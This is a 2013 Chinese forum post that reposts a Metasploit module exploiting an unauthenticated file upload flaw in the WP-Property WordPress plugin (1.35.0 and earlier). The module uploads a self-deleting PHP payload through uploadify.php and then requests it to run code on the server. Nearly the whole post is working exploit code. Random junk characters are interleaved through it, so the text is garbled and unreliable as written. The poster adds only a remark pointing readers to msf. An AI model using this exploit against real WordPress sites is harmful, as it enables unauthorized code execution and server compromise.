WordPress WP-Property PHP 文件上传漏洞2 y+ R4 ~+ E) {9 B3 R
1 v3 a0 i8 Q) h7 h2 V ## # This file is part of the Metasploit Framework and may be subject to5 H' Z7 F6 M: D
) u4 ]! V8 h: N9 R3 \% K# redistribution and commercial restrictions. Please see the Metasploit
$ v, G7 R, [- n8 \* u( Y" ^# D9 H8 z6 j: ^. `# n9 Z- l4 L
# Framework web site for more information on licensing and terms of use.
7 G7 J9 @( Z% W" ]2 T: x4 J# Z4 v2 F. y h+ h
# http://metasploit.com/framework/ ##
+ o2 x. I% k5 [
- q* `& k8 \6 @ 9 P$ W& a4 Q. C8 J) Y) U
1 B& `# G! E, A& J' y ? ?/ ^6 b( u $ j8 w: S( F! Q( L! ]# [
2 _! \* a4 Z# Q' orequire 'msf/core', d5 W/ Q5 L) a
require 'msf/core/exploit/php_exe'
% |% `; S* e7 f4 H# @2 `3 h$ f' L0 H, l3 k
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
" Y6 B2 _& t7 S& ~6 E. k- y'Description' => %q{5 g+ O$ |' h' `$ ?2 I
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>6 ~, [' |) [7 o; B* g/ q8 i) \( |+ t
[
' K" y2 z2 [0 B'Sammy FORGIT', # initial discovery5 D7 ] w1 S/ ?4 w+ c2 M
'James Fitts <fitts.james[at]gmail.com>' # metasploit module: E9 \3 d2 ]) J7 J
],( m1 L2 N2 t# w( Z0 O$ E W
'License' => MSF_LICENSE,& A" |) b5 g' P
'References' =>
5 A/ B/ m" T/ Y[8 W7 X7 B* h: A# ~7 @. I
[ 'OSVDB', '82656' ],
9 }3 |6 a, Y2 Y/ ?[ 'BID', '53787' ],
! u) {! I( d9 k: U[ 'EDB', '18987']," N7 _; b3 ?- B \" N8 T( r" o
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
+ B- g( m1 a. e],
7 [3 {3 R8 J8 q' D5 _' U* }'Payload' =>: s' F+ T9 a: r& v% j8 X
{
; J4 @, f$ e$ [; B$ s'BadChars' => "\x00",/ ?/ x! {. K' k: O4 D$ S
},
5 N8 k0 f* r- V'Platform' => 'php',
7 g% ~! U3 D8 A `7 d'Arch' => ARCH_PHP,6 y8 J7 j! y! @$ `" g6 P
'Targets' =>
! W0 q" U" r) T7 K9 C[
0 {$ Z/ ~4 D2 `# h7 u9 W3 r[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
+ }& ]" R1 |" t3 B X* S[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]* w* b6 T; H, t* J, t
],7 R6 x p: {) v+ O0 l+ i5 y+ G2 K H1 ^
'DefaultTarget' => 0,
5 a; s' Z' B" z1 V- ?! c0 k( _'DisclosureDate' => 'Mar 26 2012'))3 [. f' E Q7 B5 e" W1 V
0 t) v6 n4 `( f- l! [5 rregister_options(
/ w8 h v8 ^* Z4 H1 |5 G[- }+ R3 e9 d/ y) V6 F1 Q
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])' r* U( B, Y ^5 L" ]& F( c
], self.class)
# F e' \# ^( t) L' J7 Oend
/ |; U% v6 ^8 \% Z+ O& Y
# ]/ @6 v3 c. j% W' bdef check
; p. |, v' X; l( @3 V$ F2 Nuri = target_uri.path1 ?* g3 f Q( A# ?) w
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',0 [/ G6 H; z0 p9 |) u" F9 `
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
2 f" l% F. P: b# \" }})
, {9 [) d6 v1 k' d6 r
) Y) |6 F% p7 A# E6 o8 ~: Hif not res or res.code != 200
( C: r- H0 z/ _- creturn Exploit::CheckCode::Unknown
. V1 z4 T6 o, C ]; ^) I4 Uend
5 |1 A2 O( u' y% p% M. N' E" l) o3 p5 O3 \% Y8 n4 e
return Exploit::CheckCode::Appears: F) X# n1 Z. j6 N8 n5 ?
end2 Q3 Z; J" |' U4 Z- S
" z8 K8 x1 \) w9 F) A Odef exploit% S0 T8 g! l5 i/ I5 q
uri = target_uri.path
8 M# [7 Y( u% [* c' ~( K4 @7 duri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
( n m5 I i# _; z3 U5 }3 [- f( a% a, T) F2 M; @
data = Rex::MIME::Message.new
* z: Z! ~; b- w: @/ Z' ~data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\""), |% o$ @: I8 X; N) l
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
( i+ Q3 F- q( t* A# d$ h( Z. ipost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')/ P' [- J' k+ `& |. n
5 n4 w2 n1 V; s ~
print_status("#{peer} - Uploading payload #{@payload_name}")
2 O) R4 q8 B, Ores = send_request_cgi({ J( G6 N+ n* O$ O, z" g
'method' => 'POST',
# U& h: v& _0 j* V'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",, r- ?! z/ A+ q
'ctype' => "multipart/form-data; boundary=#{data.bound}",' _$ d4 n% N) y8 K* L
'data' => post_data
& K0 F3 d ~9 |+ Y! W' `& y0 H})" e7 W1 ^2 W9 ~8 ]+ G
6 k9 V1 ]+ w* T0 t
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
* m7 h) K+ ?5 M+ r) Sfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")8 q( B3 y, W; y0 p9 V; T( b
end Y, Q5 `3 p6 c& B" P# S$ w
4 P: j9 X) E* k+ o) }5 J0 L0 O4 Uupload_uri = res.body
, L$ V1 d) g2 P% c* U% K4 n, N0 p' ?- u; o
print_status("#{peer} - Executing payload #{@payload_name}")* N! x) t) c. \, K2 N6 t
res = send_request_raw({
: r7 x2 M2 w! n4 b6 y5 ], k'uri' => upload_uri,. W; O- r$ j: A m
'method' => 'GET'
, S; }: e4 f+ a) C% i5 O})2 l( ?# l1 E: J6 T: f1 F
end1 V7 b6 s5 f& ~, s2 Y( P
end6 v' V# R( ]4 t3 ?9 U& C. y' o
) w6 k$ v, y& M5 {8 b3 m2 ^5 n+ g
不要问我这写的是什么 怎么利用 我是说msf.
; S& c4 K) v: a$ B
$ [/ ?- Z3 u: v$ [9 h3 }5 K |
发表于 2013-1-4 19:51:30
收藏
支持
反对